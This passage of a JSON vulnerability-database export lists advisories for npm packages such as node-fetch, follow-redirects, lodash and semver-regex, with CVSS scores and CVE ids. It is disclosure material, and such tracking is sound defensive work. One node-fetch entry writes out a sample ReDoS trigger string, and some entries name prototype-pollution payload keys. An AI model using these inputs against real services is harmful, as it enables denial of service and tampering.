"availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3795"], "modified": "2023-02-01T05:06:06", "id": "GHSA-44C6-4V22-4MHX", "href": "https://github.com/advisories/GHSA-44c6-4v22-4mhx", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-03T05:07:41", "description": "Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T00:00:31", "type": "github", "title": "Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2023-02-03T05:05:57", "id": "GHSA-PW2R-VQ6V-HR8C", "href": "https://github.com/advisories/GHSA-pw2r-vq6v-hr8c", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-27T08:25:37", "description": "[node-fetch](https://www.npmjs.com/package/node-fetch) is a light-weight module that brings window.fetch to node.js.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the `isOriginPotentiallyTrustworthy()` function in `referrer.js`, when processing a URL string with alternating letters and periods, such as `'http://' + 'a.a.'.repeat(i) + 'a'`.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-02T00:00:25", "type": "github", "title": "node-fetch Inefficient Regular Expression Complexity ", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2023-01-27T05:07:52", "id": "GHSA-VP56-6G26-6827", "href": "https://github.com/advisories/GHSA-vp56-6g26-6827", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-02T23:08:59", "description": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-01-21T23:55:52", "type": "github", "title": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2023-03-02T21:34:14", "id": "GHSA-R683-J2X4-V87G", "href": "https://github.com/advisories/GHSA-r683-j2x4-v87g", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-04-15T14:32:15", "description": "# Withdrawn\n\nGitHub has chosen to publish this CVE as a withdrawn advisory due to it not being a security issue. See [this issue](https://github.com/lodash/lodash/issues/5261) for more details.\n\n# CVE description\n\n\"** DISPUTED ** A command injection vulnerability in Lodash 4.17.21 allows attackers to achieve arbitrary code execution via the template function. This is a different parameter, method, and version than CVE-2021-23337. NOTE: the vendor's position is that it's the developer's responsibility to ensure that a template does not evaluate code that originates from untrusted input.", "cvss3": {}, "published": "2021-12-03T20:37:32", "type": "github", "title": "Withdrawn: Arbitrary code execution in lodash", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-23337", "CVE-2021-41720"], "modified": "2021-12-03T20:37:45", "id": "GHSA-8P5Q-J9M2-G8WR", "href": "https://github.com/advisories/GHSA-8p5q-j9m2-g8wr", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-02T23:09:00", "description": "follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-12T22:46:26", "type": "github", "title": "Exposure of sensitive information in follow-redirects", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155"], "modified": "2023-03-02T21:37:51", "id": "GHSA-74FJ-2J2H-C42Q", "href": "https://github.com/advisories/GHSA-74fj-2j2h-c42q", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cnvd": [{"lastseen": "2022-11-21T12:10:58", "description": "npm semver-regex is a regular expression used to match semver versions. semver-regex versions prior to 3.1.4 and versions 4.0.0 (inclusive) through 4.0.2 have a denial of service vulnerability that stems from not properly handling incoming error messages, which can be exploited to cause a denial of service of the application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-09T00:00:00", "type": "cnvd", "title": "npm semver-regex denial of service vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43307"], "modified": "2022-11-15T00:00:00", "id": "CNVD-2022-76985", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-76985", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhatcve": [{"lastseen": "2023-03-08T08:17:17", "description": "A flaw was found in the Ramda NPM package that involves prototype poisoning. This flaw allows attackers to supply a crafted object, affecting the integrity or availability of the application.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-10T18:58:53", "type": "redhatcve", "title": "CVE-2021-42581", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42581"], "modified": "2023-03-08T05:20:39", "id": "RH:CVE-2021-42581", "href": "https://access.redhat.com/security/cve/cve-2021-42581", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-03-08T20:18:59", "description": "node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after fetch() has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-24T10:46:39", "type": "redhatcve", "title": "CVE-2020-15168", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2023-03-08T18:56:08", "id": "RH:CVE-2020-15168", "href": "https://access.redhat.com/security/cve/cve-2020-15168", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-08T23:21:41", "description": "A flaw was found in nodejs-lodash. A Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions is possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-15T21:48:23", "type": "redhatcve", "title": "CVE-2020-28500", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2023-03-08T21:59:20", "id": "RH:CVE-2020-28500", "href": "https://access.redhat.com/security/cve/cve-2020-28500", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-08T23:27:55", "description": "A Prototype Pollution vulnerability was found in lodash. Calling certain methods with untrusted JSON could lead to modifying objects up the prototype chain, including the global Object. A crafted JSON object passed to a vulnerable method could lead to denial of service or data injection, with various consequences.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-04-09T10:52:58", "type": "redhatcve", "title": "CVE-2019-10744", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2023-03-08T21:28:43", "id": "RH:CVE-2019-10744", "href": "https://access.redhat.com/security/cve/cve-2019-10744", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-03-08T20:20:13", "description": "A flaw was found in nodejs-lodash in versions 4.17.15 and earlier. A prototype pollution attack is possible which can lead to arbitrary code execution. The primary threat from this vulnerability is to data integrity and system availability.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-15T20:08:37", "type": "redhatcve", "title": "CVE-2020-8203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2023-03-08T19:46:38", "id": "RH:CVE-2020-8203", "href": "https://access.redhat.com/security/cve/cve-2020-8203", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-03-08T02:19:22", "description": "A flaw was found in the npm library trim where a specifically crafted input can cause a regular expression to take an abnormal amount of time to compute. All versions of package trim are vulnerable to Regular Expression Denial of Service (ReDoS) [DNP] via trim().\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-12-01T16:26:06", "type": "redhatcve", "title": "CVE-2020-7753", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7753"], "modified": "2023-03-08T01:05:00", "id": "RH:CVE-2020-7753", "href": "https://access.redhat.com/security/cve/cve-2020-7753", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-08T23:21:43", "description": "A flaw was found in nodejs-lodash. A command injection flaw is possible through template variables.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T21:45:02", "type": "redhatcve", "title": "CVE-2021-23337", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2023-03-08T21:59:25", "id": "RH:CVE-2021-23337", "href": "https://access.redhat.com/security/cve/cve-2021-23337", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-08T02:16:01", "description": "A flaw was found in the semver-regex library where it could lead to consuming a big amount of resources when executing specific strings. Attackers could take advantage of this by crafting an invalid version causing a disruption or a denial of service (DoS).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-09-20T17:46:53", "type": "redhatcve", "title": "CVE-2021-3795", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3795"], "modified": "2023-03-07T23:24:08", "id": "RH:CVE-2021-3795", "href": "https://access.redhat.com/security/cve/cve-2021-3795", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-08T23:18:27", "description": "A flaw was found in the follow-redirects package. This flaw allows the exposure of sensitive information to an unauthorized actor due to the usage of insecure HTTP protocol. This issue happens with an Authorization header leak from the same hostname, https-http, and requires a Man-in-the-Middle (MITM) attack.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T19:47:22", "type": "redhatcve", "title": "CVE-2022-0536", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2023-03-08T22:28:32", "id": "RH:CVE-2022-0536", "href": "https://access.redhat.com/security/cve/cve-2022-0536", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-09T02:13:51", "description": "A flaw was found in the node-fetch package. Affected 3.x versions of the node-fetch package are vulnerable to denial of service attacks, affecting system availability.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-02T11:39:48", "type": "redhatcve", "title": "CVE-2022-2596", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2023-03-09T01:21:21", "id": "RH:CVE-2022-2596", "href": "https://access.redhat.com/security/cve/cve-2022-2596", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-08T20:23:20", "description": "A flaw was found in nodejs-set-value. The function mixin-deep can be tricked into adding or modifying properties of Object.prototype using any of the constructor, prototype, or _proto_ payloads. The highest threat from this vulnerability is to data confidentiality and integrity.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-07T17:03:44", "type": "redhatcve", "title": "CVE-2019-10747", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744", "CVE-2019-10747"], "modified": "2023-03-08T19:13:45", "id": "RH:CVE-2019-10747", "href": "https://access.redhat.com/security/cve/cve-2019-10747", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-09T15:46:19", "description": "A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as \"Authorization,\" \"WWW-Authenticate,\" and \"Cookie\" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized actor.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-05-07T13:58:10", "type": "redhatcve", "title": "CVE-2022-0235", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2023-03-09T15:41:56", "id": "RH:CVE-2022-0235", "href": "https://access.redhat.com/security/cve/cve-2022-0235", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-03-08T23:18:55", "description": "A flaw was found in follow-redirects when fetching a remote URL with a cookie when it gets to the Location response header. This flaw allows an attacker to hijack the account as the cookie is leaked.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-24T18:54:20", "type": "redhatcve", "title": "CVE-2022-0155", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155"], "modified": "2023-03-08T21:27:09", "id": "RH:CVE-2022-0155", "href": "https://access.redhat.com/security/cve/cve-2022-0155", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2022-05-11T12:18:16", "description": "Prototype poisoning in function mapObjIndexed in Ramda 0.27.0 and earl ...", "cvss3": {}, "published": "2022-05-10T11:15:00", "type": "debiancve", "title": "CVE-2021-42581", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-42581"], "modified": "2022-05-10T11:15:00", "id": "DEBIANCVE:CVE-2021-42581", "href": "https://security-tracker.debian.org/tracker/CVE-2021-42581", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-23T02:08:35", "description": "node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after fetch() has completed, your JS thread could get 